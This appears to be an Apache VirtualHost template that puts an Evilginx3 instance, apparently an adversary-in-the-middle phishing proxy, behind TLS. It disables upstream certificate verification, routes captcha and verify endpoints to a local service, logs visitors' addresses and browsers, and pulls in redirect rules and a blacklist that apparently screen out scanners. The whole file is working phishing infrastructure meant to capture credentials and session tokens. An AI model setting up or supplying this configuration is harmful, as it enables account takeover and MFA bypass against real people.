<VirtualHost *:443>
    ServerAlias evilginx3.template 
    SSLEngine on
    SSLProxyEngine On
    SSLProxyVerify none 
    SSLProxyCheckPeerCN off
    SSLProxyCheckPeerName off
    SSLProxyCheckPeerExpire off
    SSLCertificateFile
    SSLCertificateChainFile
    SSLCertificateKeyFile
    ProxyPreserveHost On
    ProxyPass /recaptcha http://127.0.0.1/recaptcha
    ProxyPassReverse /recaptcha http://127.0.0.1/recaptcha
    ProxyPass /verify http://127.0.0.1/verify
    ProxyPassReverse /verify http://127.0.0.1/verify
    ProxyPass / https://127.0.0.1:8443/
    ProxyPassReverse / https://127.0.0.1:8443/
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access_evilginx3.log "%h \"%r\" \"%{Referer}i\" \"%{User-Agent}i\""
    Include /etc/apache2/redirect.rules
<Location />
    <RequireAll>
        Require all granted
        Include /etc/apache2/blacklist.conf
    </RequireAll>
</Location>
</VirtualHost>